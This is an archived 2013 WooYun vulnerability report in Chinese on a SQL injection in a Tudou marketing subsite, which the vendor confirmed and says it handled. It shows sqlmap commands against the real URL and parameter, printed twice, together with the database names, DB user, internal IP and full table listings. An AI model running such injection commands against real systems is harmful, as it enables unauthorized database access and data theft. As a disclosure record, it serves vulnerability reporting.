当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035701

漏洞标题:土豆某分站SQL注入漏洞一枚

相关厂商:土豆网

漏洞作者: 风仔

提交时间:2013-08-30 18:00

修复时间:2013-10-14 18:01

公开时间:2013-10-14 18:01

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-30: 细节已通知厂商并且等待厂商处理中
2013-08-31: 厂商已经确认,细节仅向厂商公开
2013-09-10: 细节向核心白帽子及相关领域专家公开
2013-09-20: 细节向普通白帽子公开
2013-09-30: 细节向实习白帽子公开
2013-10-14: 细节向公众公开

简要描述:

SQL注入一枚,无意间发现的,没啥技术含量,该站貌似很久没更新了,数据库服务器貌似在内网(10.25.10.10),面临被进一步渗透的风险。
貌似某娃哈哈技术小组的童鞋已经光临过了,这帮小盆友会不会进一步渗透或者已经渗透进去了,土豆、优酷的大牛补完再查查吧!

详细说明:

python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --current-db
current database: 'marketing_db'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --users
database management system users [1]:
[*] 'mktapp'@'10.25.10.10_'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --dbs
available databases [4]:
[*] information_schema
[*] marketing_db
[*] test
[*] wahaha
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "marketing_db"
Database: marketing_db
[55 tables]
+-----------------------+
| adm_access |
| adm_func |
| adm_user |
| admin_info |
| hack |
| ipdate |
| log_video_player |
| mkt_behavior |
| mkt_comment |
| mkt_configure |
| mkt_counter |
| mkt_creation |
| mkt_creation2 |
| mkt_creation4 |
| mkt_creation_bankcomm |
| mkt_crontab |
| mkt_event |
| mkt_event_demo |
| mkt_media_etl |
| mkt_misc |
| mkt_partner |
| mkt_scenario |
| mkt_scenario_stat |
| mkt_scene |
| mkt_score |
| mkt_stock |
| mkt_tree |
| mkt_unit |
| mkt_upload |
| mkt_view |
| mkt_visitor |
| mkt_visitor_extend |
| msg_hits |
| msg_records |
| msg_users |
| skip |
| tb_jscm_rank |
| tb_jscm_recod |
| tb_list |
| tb_manager |
| tb_mc_blog |
| tb_shcm_candidate |
| tb_shcm_wlan |
| tb_vote_limit |
| teaser_emails |
| tt_admin |
| tt_event |
| tt_page |
| tt_rank |
| tt_ria |
| tt_video |
| unt_levis_num |
| user_list |
| user_lucky |
| userinfo |
+-----------------------+
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "wahaha"
Database: wahaha
[44 tables]
+------------+
| test |
| whha_1 |
| whha_10 |
| whha_2 |
| whha_3 |
| whha_4 |
| whha_5 |
| whha_6 |
| whha_7 |
| whha_8 |
| whha_9 |
| whha_ah |
| whha_award |
| whha_bj |
| whha_cq |
| whha_f |
| whha_fj |
| whha_gd |
| whha_gq |
| whha_gx |
| whha_gz |
| whha_hb |
| whha_hlj |
| whha_hn |
| whha_hub |
| whha_hun |
| whha_hz |
| whha_jl |
| whha_js |
| whha_jx |
| whha_ln |
| whha_nmg |
| whha_nx |
| whha_sax |
| whha_sc |
| whha_sd |
| whha_sh |
| whha_shx |
| whha_sx |
| whha_t |
| whha_tj |
| whha_xj |
| whha_yn |
| whha_zj |
+------------+

漏洞证明:

python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --current-db
current database: 'marketing_db'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --users
database management system users [1]:
[*] 'mktapp'@'10.25.10.10_'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --dbs
available databases [4]:
[*] information_schema
[*] marketing_db
[*] test
[*] wahaha
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "marketing_db"
Database: marketing_db
[55 tables]
+-----------------------+
| adm_access |
| adm_func |
| adm_user |
| admin_info |
| hack |
| ipdate |
| log_video_player |
| mkt_behavior |
| mkt_comment |
| mkt_configure |
| mkt_counter |
| mkt_creation |
| mkt_creation2 |
| mkt_creation4 |
| mkt_creation_bankcomm |
| mkt_crontab |
| mkt_event |
| mkt_event_demo |
| mkt_media_etl |
| mkt_misc |
| mkt_partner |
| mkt_scenario |
| mkt_scenario_stat |
| mkt_scene |
| mkt_score |
| mkt_stock |
| mkt_tree |
| mkt_unit |
| mkt_upload |
| mkt_view |
| mkt_visitor |
| mkt_visitor_extend |
| msg_hits |
| msg_records |
| msg_users |
| skip |
| tb_jscm_rank |
| tb_jscm_recod |
| tb_list |
| tb_manager |
| tb_mc_blog |
| tb_shcm_candidate |
| tb_shcm_wlan |
| tb_vote_limit |
| teaser_emails |
| tt_admin |
| tt_event |
| tt_page |
| tt_rank |
| tt_ria |
| tt_video |
| unt_levis_num |
| user_list |
| user_lucky |
| userinfo |
+-----------------------+
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "wahaha"
Database: wahaha
[44 tables]
+------------+
| test |
| whha_1 |
| whha_10 |
| whha_2 |
| whha_3 |
| whha_4 |
| whha_5 |
| whha_6 |
| whha_7 |
| whha_8 |
| whha_9 |
| whha_ah |
| whha_award |
| whha_bj |
| whha_cq |
| whha_f |
| whha_fj |
| whha_gd |
| whha_gq |
| whha_gx |
| whha_gz |
| whha_hb |
| whha_hlj |
| whha_hn |
| whha_hub |
| whha_hun |
| whha_hz |
| whha_jl |
| whha_js |
| whha_jx |
| whha_ln |
| whha_nmg |
| whha_nx |
| whha_sax |
| whha_sc |
| whha_sd |
| whha_sh |
| whha_shx |
| whha_sx |
| whha_t |
| whha_tj |
| whha_xj |
| whha_yn |
| whha_zj |
+------------+

修复方案:

你懂的O(∩_∩)O~

版权声明:转载请注明来源 风仔@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-31 13:35

厂商回复:

第三方业务,已处理,多谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-31 13:16 | ( 路人 | Rank:3 漏洞数:2 | 道可道,非常道。)

    霸气威武的漏洞。。 大神收下小弟吧。